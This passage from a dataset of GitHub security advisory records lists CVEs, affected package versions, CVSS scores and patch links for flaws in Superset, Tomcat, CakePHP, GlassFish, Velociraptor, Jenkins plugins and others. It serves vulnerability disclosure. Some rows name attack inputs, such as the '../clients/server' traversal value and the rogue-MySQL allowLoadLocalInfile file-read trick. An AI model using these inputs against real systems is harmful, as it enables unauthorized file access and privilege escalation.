'https://www.debian.org/security/2023/dsa-5337'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2023/dsa-5338'}]","{'cwe_ids': ['CWE-22'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-08T21:35:25Z', 'nvd_published_at': '2023-01-26T22:15:00Z'}" 1.4.0,GHSA-6g33-8w2q-4hxv,2023-01-11T23:01:14Z,2023-01-05T12:30:27Z,,['CVE-2021-4305'],robots-txt-guard Inefficient Regular Expression Complexity vulnerability,A vulnerability was found in Woorank robots-txt-guard. It has been rated as problematic. Affected by this issue is the function makePathPattern of the file lib/patterns.js. The manipulation of the argument pattern leads to inefficient regular expression complexity. The exploit has been disclosed to the public and may be used. The name of the patch is c03827cd2f9933619c23894ce7c98401ea824020. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-217448.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'robots-txt-guard'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-4305'}, {'type': 'WEB', 'url': 'https://github.com/Woorank/robots-txt-guard/pull/4'}, {'type': 'WEB', 'url': 'https://github.com/Woorank/robots-txt-guard/commit/c03827cd2f9933619c23894ce7c98401ea824020'}, {'type': 'PACKAGE', 'url': 'https://github.com/Woorank/robots-txt-guard'}, {'type': 'WEB', 'url': 'https://vuldb.com/?ctiid.217448'}, {'type': 'WEB', 'url': 'https://vuldb.com/?id.217448'}]","{'cwe_ids': ['CWE-1333'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-01-09T20:04:05Z', 'nvd_published_at': '2023-01-05T11:15:00Z'}" 1.4.0,GHSA-7222-r37x-8q3m,2023-01-24T18:52:25Z,2023-01-16T12:30:18Z,,['CVE-2022-43719'],Apache Superset vulnerable to Cross-Site Request Forgery via legacy REST API endpoints,Two legacy REST API endpoints for approval and request access are vulnerable to cross site request forgery. This issue affects Apache Superset version 1.5.2 and prior versions and version 2.0.0.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'apache-superset'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'apache-superset'}, 'versions': ['2.0.0']}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-43719'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/superset'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/xc309h2dphrkg33154djf3nqlh2xc1c0'}]","{'cwe_ids': ['CWE-352'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-01-20T16:25:28Z', 'nvd_published_at': '2023-01-16T11:15:00Z'}" 1.4.0,GHSA-g7gf-2rqw-5rwx,2023-02-07T15:48:13Z,2023-01-29T18:30:31Z,,['CVE-2023-0569'],Publify contains Weak Password Requirements,Weak Password Requirements in GitHub repository publify/publify prior to 9.2.10.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'publify_core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '9.2.10'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0569'}, {'type': 'WEB', 'url': 'https://github.com/publify/publify/commit/8905e4e639cf03b758da558568a86c9816253b2d'}, {'type': 'PACKAGE', 'url': 'https://github.com/publify/publify'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/publify_core/CVE-2023-0569.yml'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/81b1e1da-10dd-435e-94ae-4bdd41df6df9'}]","{'cwe_ids': ['CWE-521'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-01-31T23:39:19Z', 'nvd_published_at': '2023-01-29T17:15:00Z'}" 1.4.0,GHSA-7jf5-fvgf-48c6,2023-02-01T01:37:24Z,2023-01-19T00:30:30Z,,['CVE-2023-0290'],Velociraptor subject to Path Traversal,"Rapid7 Velociraptor did not properly sanitize the client ID parameter to the CreateCollection API, allowing a directory traversal in where the collection task could be written. It was possible to provide a client id of ""../clients/server"" to schedule the collection for the server (as a server artifact), but only require privileges to schedule collections on the client. Normally, to schedule an artifact on the server, the COLLECT_SERVER permission is required. This permission is normally only granted to ""administrator"" role. Due to this issue, it is sufficient to have the COLLECT_CLIENT privilege, which is normally granted to the ""investigator"" role. To exploit this vulnerability, the attacker must already have a Velociraptor user account at least ""investigator"" level, and be able to authenticate to the GUI and issue an API call to the backend. Typically, most users deploy Velociraptor with limited access to a trusted group, and most users will already be administrators within the GUI. This issue affects Velociraptor versions before 0.6.7-5. Version 0.6.7-5, released January 16, 2023, fixes the issue.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'www.velocidex.com/golang/velociraptor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.6.7-5'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0290'}, {'type': 'WEB', 'url': 'https://github.com/Velocidex/velociraptor/commit/4718bb0cb426564568abc77910e90a2c211a32e6'}, {'type': 'PACKAGE', 'url': 'https://github.com/Velocidex/velociraptor'}, {'type': 'WEB', 'url': 'https://github.com/Velocidex/velociraptor/compare/v0.6.7-4...v0.6.7-5'}]","{'cwe_ids': ['CWE-22'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-01T01:37:24Z', 'nvd_published_at': '2023-01-18T22:15:00Z'}" 1.4.0,GHSA-rq2w-37h9-vg94,2023-05-30T06:44:57Z,2023-01-03T21:30:21Z,,['CVE-2022-45143'],Apache Tomcat improperly escapes input from JsonErrorReportValve,"The `JsonErrorReportValve` in Apache Tomcat 8.5.83, 9.0.40 to 9.0.68 and 10.1.0-M1 to 10.1.1 does not escape the `type`, `message` or `description` values. In some circumstances these are constructed from user provided data and it was therefore possible for users to supply values that invalidated or manipulated the JSON output.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.tomcat:tomcat'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.5.83'}, {'fixed': '8.5.84'}]}], 'versions': ['8.5.83']}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.tomcat:tomcat'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.0.40'}, {'fixed': '9.0.69'}]}], 'database_specific': {'last_known_affected_version_range': '<= 9.0.68'}}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.tomcat:tomcat'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '10.1.0'}, {'fixed': '10.1.2'}]}], 'database_specific': {'last_known_affected_version_range': '<= 10.1.1'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-45143'}, {'type': 'WEB', 'url': 'https://github.com/apache/tomcat/commit/0cab3a56bd89f70e7481bb0d68395dc7e130dbbf'}, {'type': 'WEB', 'url': 'https://github.com/apache/tomcat/commit/6a0ac6a438cbbb66b6e9c5223842f53bf0cb50aa'}, {'type': 'WEB', 'url': 'https://github.com/apache/tomcat/commit/b336f4e58893ea35114f1e4a415657f723b1298e'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/tomcat'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/yqkd183xrw3wqvnpcg3osbcryq85fkzj'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202305-37'}]","{'cwe_ids': ['CWE-116', 'CWE-74'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-01-05T12:02:50Z', 'nvd_published_at': '2023-01-03T19:15:00Z'}" 1.4.0,GHSA-w5mw-f2hq-5fw8,2023-01-19T01:00:50Z,2023-01-11T18:30:27Z,,['CVE-2020-36650'],gry vulnerable to Command Injection,"A vulnerability, which was classified as critical, was found in IonicaBizau node-gry up to 5.x. This affects an unknown part. The manipulation leads to command injection. Upgrading to version 6.0.0 is able to address this issue. The name of the patch is 5108446c1e23960d65e8b973f1d9486f9f9dbd6c. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-218019.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'gry'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36650'}, {'type': 'WEB', 'url': 'https://github.com/IonicaBizau/node-gry/pull/22'}, {'type': 'WEB', 'url': 'https://github.com/IonicaBizau/node-gry/commit/5108446c1e23960d65e8b973f1d9486f9f9dbd6c'}, {'type': 'PACKAGE', 'url': 'https://github.com/IonicaBizau/node-gry'}, {'type': 'WEB', 'url': 'https://github.com/IonicaBizau/node-gry/releases/tag/6.0.0'}, {'type': 'WEB', 'url': 'https://vuldb.com/?ctiid.218019'}, {'type': 'WEB', 'url': 'https://vuldb.com/?id.218019'}]","{'cwe_ids': ['CWE-77'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-01-11T22:02:33Z', 'nvd_published_at': '2023-01-11T18:15:00Z'}" 1.4.0,GHSA-fpmr-qmgh-42x2,2023-01-24T18:53:12Z,2023-01-16T12:30:17Z,,['CVE-2022-43720'],Apache Superset vulnerable to Injection,An authenticated attacker with write CSS template permissions can create a record with specific HTML tags that will not get properly escaped by the toast message displayed when a user deletes that specific CSS template record. This issue affects Apache Superset version 1.5.2 and prior versions and version 2.0.0.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'apache-superset'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'apache-superset'}, 'versions': ['2.0.0']}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-43720'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/superset'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/jts6x56kghr9mbowb653bk70pl81jp8l'}]","{'cwe_ids': ['CWE-74'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-01-20T23:16:43Z', 'nvd_published_at': '2023-01-16T11:15:00Z'}" 1.4.0,GHSA-6g8q-qfpv-57wp,2023-01-25T16:09:33Z,2023-01-20T17:30:20Z,,['CVE-2023-22727'],CakePHP Database\\Query::offset() and limit() methods are vulnerable to SQL injection,"### Impact The `Cake\Database\Query::limit()` and `Cake\Database\Query::offset()` methods are vulnerable to SQL injection if passed un-sanitized user request data. ### Patches This issue has been fixed in 4.2.12, 4.3.11, 4.4.10 ### Workarounds Using CakePHP's Pagination library will mitigate this issue, as will validating or casting parameters to these methods. ### References https://bakery.cakephp.org/2023/01/06/cakephp_4211_4311_4410_released.html ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'cakephp/cakephp'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.2.0'}, {'fixed': '4.2.12'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'cakephp/cakephp'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.3.0'}, {'fixed': '4.3.11'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'cakephp/cakephp'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.4.0'}, {'fixed': '4.4.10'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'cakephp/database'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.2.0'}, {'fixed': '4.2.12'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'cakephp/database'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.3.0'}, {'fixed': '4.3.11'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'cakephp/database'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.4.0'}, {'fixed': '4.4.10'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/cakephp/cakephp/security/advisories/GHSA-6g8q-qfpv-57wp'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-22727'}, {'type': 'WEB', 'url': 'https://github.com/cakephp/cakephp/commit/3f463e7084b5a15e67205ced3a622577cca7a239'}, {'type': 'WEB', 'url': 'https://bakery.cakephp.org/2023/01/06/cakephp_4211_4311_4410_released.html'}, {'type': 'PACKAGE', 'url': 'https://github.com/cakephp/cakephp'}]","{'cwe_ids': ['CWE-89'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-01-20T17:30:20Z', 'nvd_published_at': '2023-01-17T21:15:00Z'}" 1.4.0,GHSA-wr3c-g326-486c,2023-01-09T19:45:01Z,2023-01-09T19:45:01Z,,['CVE-2022-23508'],GitOps Run allows for Kubernetes workload injection,"### Impact A vulnerability in GitOps run could allow a local user or process to alter a Kubernetes cluster's resources. GitOps run has a local S3 bucket which it uses for synchronising files that are later applied against a Kubernetes cluster. Its endpoint had no security controls to block unauthorised access, therefore allowing local users (and processes) on the same machine to see and alter the bucket content. By leveraging this vulnerability, an attacker could pick a workload of their choosing and inject it into the S3 bucket, which resulted in the successful deployment in the target cluster, without the need to provide any credentials to either the S3 bucket nor the target Kubernetes cluster. ### Patches This vulnerability has been fixed by commits [75268c4](https://github.com/weaveworks/weave-gitops/pull/3114/commits/75268c4d2c8f7e4db22c63d76b451ba6545d117f) and [966823b](https://github.com/weaveworks/weave-gitops/pull/3102/commits/966823bbda8c539a4661e2a4f8607c9307ba6225). Users should upgrade to Weave GitOps version >= v0.12.0 released on 08/12/2022. ### Workarounds There is no workaround for this vulnerability. ### References Disclosed by Paulo Gomes, Senior Software Engineer, Weaveworks. ### For more information If you have any questions or comments about this advisory: - Open an issue in [Weave GitOps repository](https://github.com/weaveworks/weave-gitops) - Email us at [support@weave.works](mailto:support@weave.works) ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/weaveworks/weave-gitops'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.12.0'}]}], 'database_specific': {'last_known_affected_version_range': '<= 0.11.0'}}]","[{'type': 'WEB', 'url': 'https://github.com/weaveworks/weave-gitops/security/advisories/GHSA-wr3c-g326-486c'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-23508'}, {'type': 'WEB', 'url': 'https://github.com/weaveworks/weave-gitops/pull/3102/commits/966823bbda8c539a4661e2a4f8607c9307ba6225'}, {'type': 'WEB', 'url': 'https://github.com/weaveworks/weave-gitops/pull/3114/commits/75268c4d2c8f7e4db22c63d76b451ba6545d117f'}, {'type': 'PACKAGE', 'url': 'https://github.com/weaveworks/weave-gitops'}]","{'cwe_ids': ['CWE-284', 'CWE-552'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-01-09T19:45:01Z', 'nvd_published_at': '2023-01-09T13:15:00Z'}" 1.4.0,GHSA-89qm-wcmw-3mgg,2023-01-09T19:45:35Z,2023-01-09T19:45:35Z,,['CVE-2022-23509'],Gitops Run insecure communication,"### Impact GitOps run has a local S3 bucket which it uses for synchronising files that are later applied against a Kubernetes cluster. The communication between GitOps Run and the local s3 bucket is not encrypted. This allows privileged users or process to tap the local traffic to gain information permitting access to the s3 bucket. From that point, it would be possible to alter the bucket content, resulting in changes in the Kubernetes cluster's resources(e.g. CVE-2022-23508). ### Patches This vulnerability has been fixed by commits [ce2bbff](https://github.com/weaveworks/weave-gitops/pull/3106/commits/ce2bbff0a3609c33396050ed544a5a21f8d0797f) and [babd915](https://github.com/weaveworks/weave-gitops/pull/3098/commits/babd91574b99b310b84aeec9f8f895bd18acb967). Users should upgrade to Weave GitOps version >= v0.12.0 released on 08/12/2022. ### Workarounds There is no workaround for this vulnerability. ### References Disclosed by Paulo Gomes, Senior Software Engineer, Weaveworks. ### For more information If you have any questions or comments about this advisory: - Open an issue in [Weave GitOps repository](https://github.com/weaveworks/weave-gitops) - Email us at [support@weave.works](mailto:support@weave.works) ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:A/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/weaveworks/weave-gitops'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.12.0'}]}], 'database_specific': {'last_known_affected_version_range': '<= 0.11.0'}}]","[{'type': 'WEB', 'url': 'https://github.com/weaveworks/weave-gitops/security/advisories/GHSA-89qm-wcmw-3mgg'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-23509'}, {'type': 'WEB', 'url': 'https://github.com/weaveworks/weave-gitops/pull/3098/commits/babd91574b99b310b84aeec9f8f895bd18acb967'}, {'type': 'WEB', 'url': 'https://github.com/weaveworks/weave-gitops/pull/3106/commits/ce2bbff0a3609c33396050ed544a5a21f8d0797f'}, {'type': 'PACKAGE', 'url': 'https://github.com/weaveworks/weave-gitops'}]","{'cwe_ids': ['CWE-200', 'CWE-319'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-01-09T19:45:35Z', 'nvd_published_at': '2023-01-09T14:15:00Z'}" 1.4.0,GHSA-3g5w-6pw7-6hrp,2023-01-28T01:19:43Z,2023-01-27T12:30:29Z,,['CVE-2022-2712'],Path Traversal In Eclipse GlassFish,"In Eclipse GlassFish versions 5.1.0 to 6.2.5, there is a vulnerability in relative path traversal because it does not filter request path starting with './'. Successful exploitation could allow an remote unauthenticated attacker to access critical data, such as configuration files and deployed application source code.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.glassfish.main.web:web'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.1.0'}, {'fixed': '7.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-2712'}, {'type': 'WEB', 'url': 'https://github.com/eclipse-ee4j/glassfish/pull/24077'}, {'type': 'WEB', 'url': 'https://bugs.eclipse.org/580502'}]","{'cwe_ids': ['CWE-22'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-01-28T01:19:43Z', 'nvd_published_at': '2023-01-27T10:15:00Z'}" 1.4.0,GHSA-xp3g-2729-rxm3,2023-01-24T18:05:17Z,2023-01-16T03:30:25Z,,['CVE-2023-0316'],Froxlor is vulnerable to path traversal,Path Traversal: '\..\filename' in GitHub repository froxlor/froxlor prior to 2.0.0.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'froxlor/froxlor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0316'}, {'type': 'WEB', 'url': 'https://github.com/froxlor/froxlor/commit/983d9294603925018225d672795bd8b4a526f41e'}, {'type': 'PACKAGE', 'url': 'https://github.com/Froxlor/Froxlor'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/c190e42a-4806-47aa-aa1e-ff5d6407e244'}]","{'cwe_ids': ['CWE-29'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-01-19T18:24:42Z', 'nvd_published_at': '2023-01-16T01:15:00Z'}" 1.4.0,GHSA-x22v-qgm2-7qc7,2023-01-12T16:49:16Z,2023-01-07T06:30:19Z,,['CVE-2023-0110'],usememos/memos vulnerable to stored Cross-site Scripting,Cross-site Scripting (XSS) - Stored in GitHub repository usememos/memos prior to 0.10.0.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/usememos/memos'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.10.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0110'}, {'type': 'WEB', 'url': 'https://github.com/usememos/memos/commit/46c13a4b7f675b92d297df6dabb4441f13c7cd9c'}, {'type': 'PACKAGE', 'url': 'https://github.com/usememos/memos'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/6e4a1961-dbca-46f6-ae21-c25a621e54a7'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-01-09T21:52:55Z', 'nvd_published_at': '2023-01-07T04:15:00Z'}" 1.4.0,GHSA-rx76-xw35-6rh8,2023-02-07T21:16:30Z,2023-01-31T12:30:24Z,,['CVE-2022-44644'],Apache Linkis vulnerable to Exposure of Sensitive Information,"In Apache Linkis <=1.3.0 when used with the MySQL Connector/J, an authenticated attacker could read arbitrary local file by connecting a rogue mysql server, By adding allowLoadLocalInfile to true in the jdbc parameter. Therefore, the parameters in the jdbc url should be blacklisted. Versions of Apache Linkis <= 1.3.0 will be affected. We recommend users upgrade the version of Linkis to version 1.3.1","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.linkis:linkis'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.3.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-44644'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/linkis'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/hwq9ytq6y1kdh9lz5znptkcrdll9x85h'}]","{'cwe_ids': ['CWE-20', 'CWE-200', 'CWE-312'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-02T00:09:07Z', 'nvd_published_at': '2023-01-31T10:15:00Z'}" 1.4.0,GHSA-pcc2-w6m8-x5w4,2023-02-06T16:42:09Z,2023-01-26T21:30:18Z,,['CVE-2023-24429'],Agent-to-controller security bypass in Jenkins Semantic Versioning Plugin ,"Jenkins Semantic Versioning Plugin 1.14 and earlier does not restrict execution of an controller/agent message to agents, and implements no limitations about the file path that can be parsed, allowing attackers able to control agent processes to have Jenkins parse a crafted file that uses external entities for extraction of secrets from the Jenkins controller or server-side request forgery.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:semantic-versioning-plugin'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.15'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-24429'}, {'type': 'WEB', 'url': 'https://github.com/jenkinsci/semantic-versioning-plugin/commit/c67a89822f86a7d10498ea2783b833052b719086'}, {'type': 'PACKAGE', 'url': 'https://github.com/jenkinsci/semantic-versioning-plugin'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-01-24/#SECURITY-2973%20(1)'}]","{'cwe_ids': ['CWE-611'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-01-27T01:00:32Z', 'nvd_published_at': '2023-01-26T21:18:00Z'}" 1.4.0,GHSA-7mg5-rw39-q67f,2023-01-12T20:58:35Z,2023-01-06T18:30:19Z,,['CVE-2014-125051'],himiklab yii2-jqgrid-widget vulnerable to SQL Injection,A vulnerability was found in himiklab yii2-jqgrid-widget up to 1.0.7. It has been declared as critical. This vulnerability affects the function `addSearchOptionsRecursively` of the file `JqGridAction.php`. The manipulation leads to sql injection. Upgrading to version 1.0.8 can address this issue. The name of the patch is a117e0f2df729e3ff726968794d9a5ac40e660b9. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-217564.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'himiklab/yii2-jqgrid-widget'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.8'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2014-125051'}, {'type': 'WEB', 'url': 'https://github.com/himiklab/yii2-jqgrid-widget/commit/a117e0f2df729e3ff726968794d9a5ac40e660b9'}, {'type': 'PACKAGE', 'url': 'https://github.com/himiklab/yii2-jqgrid-widget'}, {'type': 'WEB', 'url': 'https://github.com/himiklab/yii2-jqgrid-widget/releases/tag/1.0.8'}, {'type': 'WEB', 'url': 'https://vuldb.com/?ctiid.217564'}, {'type': 'WEB', 'url': 'https://vuldb.com/?id.217564'}]","{'cwe_ids': ['CWE-89'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-01-12T20:58:35Z', 'nvd_published_at': '2023-01-06T17:15:00Z'}" 1.4.0,GHSA-m4f8-p58g-j8mj,2023-01-25T02:56:52Z,2023-01-18T00:30:18Z,,['CVE-2010-10006'],Observable timing discrepancy in JOpenId,"A vulnerability, which was classified as problematic, was found in michaelliao jopenid. Affected is the function getAuthentication of the file JOpenId/src/org/expressme/openid/OpenIdManager.java. The manipulation leads to observable timing discrepancy. Upgrading to version 1.08 is able to address this issue. The name of the patch is c9baaa976b684637f0d5a50268e91846a7a719ab. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-218460.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.expressme:JOpenId'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.08'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2010-10006'}, {'type': 'WEB', 'url': 'https://github.com/michaelliao/jopenid/commit/c9baaa976b684637f0d5a50268e91846a7a719ab'}, {'type': 'WEB', 'url': 'https://github.com/michaelliao/jopenid/releases/tag/JOpenId-1.08'}, {'type': 'WEB', 'url': 'https://vuldb.com/?ctiid.218460'}, {'type': 'WEB', 'url': 'https://vuldb.com/?id.218460'}]","{'cwe_ids': ['CWE-203', 'CWE-208'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-01-25T02:56:52Z', 'nvd_published_at': '2023-01-18T00:15:00Z'}" 1.4.0,GHSA-m6q8-mwf6-6mmc,2023-01-27T01:18:39Z,2023-01-26T21:30:18Z,,['CVE-2023-24434'],CSRF vulnerability in Jenkins GitHub Pull Request Builder Plugin,"A cross-site request forgery (CSRF) vulnerability in Jenkins GitHub Pull Request Builder Plugin 1.42.2 and earlier allows attackers to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.",[],"[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:ghprb'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.42.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-24434'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-01-24/#SECURITY-2789%20(2)'}]","{'cwe_ids': ['CWE-352'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-01-27T01:18:39Z', 'nvd_published_at': '2023-01-26T21:18:00Z'}" 1.4.0,GHSA-wvr2-q86m-6whp,2023-01-12T22:47:31Z,2023-01-07T21:30:38Z,,['CVE-2021-4307'],Baobab vulnerable to Prototype Pollution,A vulnerability was found in Yomguithereal Baobab up to 2.6.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality. The manipulation leads to improperly controlled modification of object prototype attributes ('prototype pollution'). The attack can be launched remotely. Upgrading to version 2.6.1 